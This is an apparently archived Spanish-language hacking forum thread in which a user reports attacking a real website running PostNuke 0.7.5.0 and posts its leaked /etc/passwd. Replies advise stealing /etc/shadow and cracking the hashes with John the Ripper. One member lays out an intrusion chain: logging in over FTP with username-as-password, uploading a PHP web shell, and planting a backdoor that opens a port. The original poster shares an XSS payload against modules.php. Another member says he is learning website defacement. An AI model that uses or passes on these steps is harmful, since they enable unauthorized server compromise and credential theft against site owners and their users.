Creo que le pege xD

Miren le tire a una bulnerabilidad a una web y sake esto.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash dgfupkrn:x:32003:32005::/home/dgfupkrn:/usr/local/cpanel/bin/noshell xokpzysk:x:32004:32006::/home/xokpzysk:/usr/local/cpanel/bin/noshell telemula:x:32005:32007::/home/telemula:/usr/local/cpanel/bin/noshell rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

Que es xDD

no es por ofender pero algo "no util"
as obtenido la carpeta /etc/passwd de del site.
Si quieres algo realmente util obten la carpeta /etc/shadow ay obtendras el pass encriptao de los usuarios

Ok, gracias.

Por eso boy, pero por algo se empiesa Grin

Gracias

Te recomiendo que para crackear los pass utilizes john the ripper es el mejor Grin

para algunos si es algo util, por que los que dicen "nologins" o no tienen "razon" pueden entrar por ftp usuario/usuario
ejemplo ftp www.tumama.com login : mailman pass : mailman

en mi caso muchas veces me sirve 1 una site que tenga ftp
ya que entro de esa forma, y luego en el usuario dejas una shell php
asi kedaria

www.tumama.com/~mailman/nombreshell.php

y desde ahi metes un bakdoor luego ejecutas,
y eso habre 1 puerto en el servicor ( o maquina )
y listo tienes acceso al servidor central y ahi le haces todo lo que quieras a tus anchas... espero y halla servido de algo mi respuesta :>

otra cosa, quisiera saber si es posible que vuln usaste para que te tire el etc/passwd, por q yo lo he querido hacer Tongue

Saludos...
Infected...

Lo que ataco es un postnuke vercion 0.7.5.0 y esto fye lo que use Wink

Código:

laweb.com/modules.php/';<\script></head><body><script>alert(document.cookie)<\script>/script>/?[arguments]

pero lo que obtienes ay no es una cookie?
laweb.com/modules.php/';<\script></head><body><script>alert(document.cookie)[/u]<\script>/script>/?[arguments]

Cita de: arquimedes en Octubre 17, 2006, 08:29:52

pero lo que obtienes ay no es una cookie?
laweb.com/modules.php/';<\script></head><body><script>alert(document.cookie)[/u]<\script>/script>/?[arguments]

Yo solo te paso lo que causo eso xD

Si eso estaba intentando, pero el codigo iso saltar un error en uno de los bloques que tenia en la web Cheesy

Código:

bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
daemon:/:/sbin/nologin
SSH:/var/empty/sshd:/sbin/nologin user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin
User:/var/lib/nfs:/sbin/nologin
NFS User:/var/lib/nfs:/sbin/nologin

Weno aqui tienes todos aquellos que no tienen login, espero que te sea de utilidad

Buenas,
Alguien me podria explicar que son:

Citar

Rutas de que??? carpetas de la web,
Esque me estoy iniciando en los defaces y en algunos exploits me salian rutas similares aa esas, asi ya sabria de una vez que son

GRACIAS;D

haber esta lista muestra los usuarios, el numero de ID y PID(corriganme si me equivoco) y la shell que ejecuta (bash, secure...) PERO NO SALE EL PASS LO QUE SALE ES QUIEN NO TIENE PASS. En los que salga nologin quiere decir que no ay pass, pero con muxo de ellos no te dejara entrar ya que son daemons(programas que se ejecutan en segundo plano)
lo que puedes hacer es intentar logerate con alguno de ellos aber si ay suerte

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Octubre 07, 2008, 03:40:49